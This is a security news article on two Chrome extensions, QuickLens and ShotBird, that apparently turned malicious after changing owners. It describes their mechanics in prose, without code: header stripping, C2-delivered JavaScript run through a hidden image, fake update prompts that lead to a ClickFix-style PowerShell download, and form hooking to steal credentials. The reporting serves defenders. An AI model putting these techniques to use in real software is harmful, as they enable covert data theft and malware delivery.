Two Google Chrome extensions turned malicious after what appears to be ownership transfers, giving attackers a way to inject arbitrary code, push malware to downstream users, and harvest sensitive data. The affected add-ons are QuickLens – Search Screen with Google Lens, which had 7,000 users, and ShotBird – Scrolling Screenshots, Tweet Images & Editor, which had 800 users when The Hacker News reported the incident.
The extensions were originally associated with developer akshayanuonline[@]gmail[.]com, also known as BuildMelon. According to monxresearch-sec, ShotBird received a Featured flag in January 2025 before it was transferred to loraprice198865[@]gmail[.]com last month, while Annex Security researcher John Tuckner said QuickLens was listed for sale on ExtensionHub on October 11, 2025, and changed ownership on February 1, 2026, to support[@]doodlebuggle[.]top.
The malicious QuickLens update landed on February 17, 2026. Tuckner said it preserved the extension's original functionality but added code to strip security headers such as X-Frame-Options from HTTP responses, which allowed injected scripts to make arbitrary cross-domain requests and bypass Content Security Policy protections.
According to the report, QuickLens also fingerprinted the victim's country, browser, and operating system, then polled an external server every five minutes for JavaScript that was stored in local storage and executed on every page load through a hidden 1×1 GIF <img> element with an onload handler.
“The actual malicious code never appears in the extension's source files,” Tuckner said. “Static analysis shows a function that creates image elements. That's it. The payloads are delivered from the C2 and stored in local storage — they only exist at runtime.”
monxresearch-sec found ShotBird used direct callbacks to deliver JavaScript instead of the 1×1 image method. The code displayed a fake Google Chrome update prompt that led users to a ClickFix-style page instructing them to open the Windows Run dialog, launch cmd.exe, and paste a PowerShell command that downloaded googleupdate.exe on Windows systems.
The malware hooked input, textarea, and select HTML elements to capture data entered by victims, including credentials, PINs, card details, tokens, and government identifiers. The report said it also exfiltrated Chrome data such as passwords, browsing history, and extension-related information.
“This is a two-stage abuse chain: extension-side remote browser control plus host-level execution pivot via fake updates,” the researcher said. “The result is high-risk data exposure in-browser and confirmed host-side script execution on at least one affected system.”
The Hacker News said the same threat actor is likely behind both compromises based on the shared command-and-control pattern, ClickFix lures injected into browsing sessions, and ownership transfer as the infection vector. The case mirrors other extension and supply-chain incidents Cyberwarzone has covered, including the Trust Wallet browser extension poisoned in the Shai-Hulud npm attack and the VSCode fork extension attack that hijacked recommendations.
